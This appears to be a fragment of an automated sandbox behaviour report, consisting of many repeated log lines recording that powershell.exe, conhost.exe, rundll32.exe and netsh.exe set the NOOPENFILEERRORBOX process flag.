    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
